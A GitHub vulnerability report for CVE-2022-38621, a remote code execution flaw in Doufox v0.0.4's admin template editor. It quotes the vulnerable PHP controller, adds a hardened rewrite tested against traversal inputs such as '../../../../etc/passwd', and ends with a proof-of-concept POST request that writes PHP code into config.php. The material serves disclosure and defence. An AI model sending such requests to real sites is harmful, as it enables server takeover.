CVE-2022-38621: Doufox edit file has an RCE vulnerability · Issue #7 · Doufox/Doufox
Doufox v0.0.4 contains a remote code execution (RCE) vulnerability in the template edit-file page: the edit handler writes the submitted content to any file under the theme directory, PHP files included, so an attacker can plant a crafted PHP file and have its code executed.
Vulnerable file: core\controllers\admin\TemplateController.php

```php
public function editAction()
{
    $theme = $this->get('theme') ? urldecode($this->get('theme')) : '';
    if (!file_exists(THEME_PATH . DS . $theme)) {
        $this->show_message('该模板不存在!', 2, url('admin/template')); // "template does not exist"
    }
    // theme, dir and file come straight from the query string and are
    // urldecode()d a second time; no extension or path check follows
    $filename = urldecode($this->get('file'));
    $dir = $this->get('dir') ? urldecode($this->get('dir')) : '/';
    $dir = str_replace(DS . DS, DS, $dir);
    $filepath = THEME_PATH . DS . $theme . $dir . $filename;
    $cur_path = DS . THEME_DIR . DS . $theme . $dir . $filename;
    if (!is_file($filepath)) {
        $this->show_message($cur_path . '该文件不存在!', 2, url('admin/template/item', array('dir' => $dir))); // "file does not exist"
    }
    if ($this->isPostForm()) {
        // the POST body is written verbatim to whatever file was resolved above
        file_put_contents($filepath, stripslashes($_POST['file_content']), LOCK_EX);
        $this->show_message('提交成功', 1); // "submitted successfully"
    }
    if (urldecode(dirname($dir)) == '.') {
        $top_url = url('admin/template/item', array('theme' => $theme));
    } else {
        $top_url = url('admin/template/item', array('theme' => $theme, 'dir' => urldecode($dir . DS)));
    }
    $filecontent = htmlspecialchars(file_get_contents($filepath));
    include $this->views('admin/template/add');
}
```
Although the template file list shows no edit button for PHP files, that restriction exists only in the UI: the controller never checks the file extension, so the theme's config.php can be opened in the editor by requesting the URL directly:

```
http://ip:port/index.php?s=admin&c=template&a=edit&theme=default&dir=/&file=config.php
```
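The following is an added example, not code from the Doufox project, showing how the path handling in editAction() could be hardened: the theme name is restricted to a single path component, the extension is allowlisted server-side rather than hidden in the UI, and the final path is canonicalised with realpath() and confined to the theme root before anything is written. DS, THEME_DIR and THEME_PATH mirror the constants the original controller uses; the temporary directory, the fixture files and the function names are assumptions made for this demo.

```php
<?php
// Added example, not Doufox code: a hardened replacement for the path
// handling in TemplateController::editAction(). DS, THEME_DIR and THEME_PATH
// mirror the constants the original uses; the temp-dir layout, the fixture
// files and the function names are assumptions made for this demo.
declare(strict_types=1);

define('DS', DIRECTORY_SEPARATOR);
define('THEME_DIR', 'themes');
define('THEME_PATH', sys_get_temp_dir() . DS . 'doufox_demo_' . getmypid() . DS . THEME_DIR);

/** Only plain template/asset types may be edited; nothing PHP will parse. */
const EDITABLE_EXTENSIONS = ['html', 'htm', 'css', 'js', 'txt'];

/**
 * Resolve theme/dir/file to an absolute path, or throw if the request points
 * at a non-template file or anywhere outside the selected theme.
 */
function resolve_editable_theme_file(string $theme, string $dir, string $file): string
{
    // The theme must be a single path component: no separators, no "..".
    // Note: $_GET is already URL-decoded by PHP; the original's extra
    // urldecode() double-decodes, so %252e%252e would arrive as "..".
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $theme)) {
        throw new InvalidArgumentException('invalid theme name');
    }
    $themeRoot = realpath(THEME_PATH . DS . $theme);
    if ($themeRoot === false || !is_dir($themeRoot)) {
        throw new InvalidArgumentException('theme does not exist');
    }

    // Allowlist the extension on the server instead of hiding the edit button.
    $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, EDITABLE_EXTENSIONS, true)) {
        throw new InvalidArgumentException('file type is not editable');
    }

    // Canonicalise, then confine to the theme root (prefix check includes the separator).
    $candidate = realpath($themeRoot . DS . trim($dir, '/\\') . DS . $file);
    if ($candidate === false) {
        throw new InvalidArgumentException('file does not exist');
    }
    if (strncmp($candidate, $themeRoot . DS, strlen($themeRoot) + 1) !== 0) {
        throw new InvalidArgumentException('path escapes theme directory');
    }
    if (!is_file($candidate)) {
        throw new InvalidArgumentException('not a regular file');
    }
    return $candidate;
}

/** Write the submitted content only after the path has been validated. */
function save_theme_file(string $theme, string $dir, string $file, string $content): int
{
    $path = resolve_editable_theme_file($theme, $dir, $file);
    // No stripslashes(): magic_quotes is gone, so stripping only corrupts content.
    return (int) file_put_contents($path, $content, LOCK_EX);
}

// --- constructed fixtures: a "default" theme with one PHP file and one template
@mkdir(THEME_PATH . DS . 'default' . DS . 'sub', 0700, true);
file_put_contents(THEME_PATH . DS . 'default' . DS . 'config.php', "<?php\n");
file_put_contents(THEME_PATH . DS . 'default' . DS . 'sub' . DS . 'index.html', "<html></html>\n");

$requests = [
    ['default', '/sub/', 'index.html'],          // legitimate template edit
    ['default', '/', 'config.php'],              // the PoC request from this report
    ['default', '/', '../../../../etc/passwd'],  // traversal through "dir"/"file"
    ['..', '/', 'index.html'],                   // traversal through "theme"
];
foreach ($requests as [$theme, $dir, $file]) {
    try {
        $n = save_theme_file($theme, $dir, $file, "<!-- edited -->\n");
        echo "ALLOW $theme $dir$file ($n bytes written)\n";
    } catch (InvalidArgumentException $e) {
        echo "DENY  $theme $dir$file: {$e->getMessage()}\n";
    }
}
```

Run with `php example.php`: the template edit under sub/ is written, while the config.php request from the PoC and both traversal attempts are rejected before file_put_contents() is reached. The three checks are deliberately layered; the extension allowlist alone would not stop a write to a .html file outside the theme, and the realpath() confinement alone would still allow editing PHP inside it.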
POC

The request below needs a valid admin session (the Cookie header); with it, the posted file_content replaces the theme's config.php, and the report's RCE claim rests on that file subsequently being loaded as PHP.

```http
POST /index.php?s=admin&c=template&a=edit&theme=default&dir=/&file=config.php HTTP/1.1
Host: ip:port
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=86s25d8kqaptrner2r2iqrqrv7;
Connection: close

file_content=<?php+phpinfo();?>&submit=%E6%8F%90%E4%BA%A4
```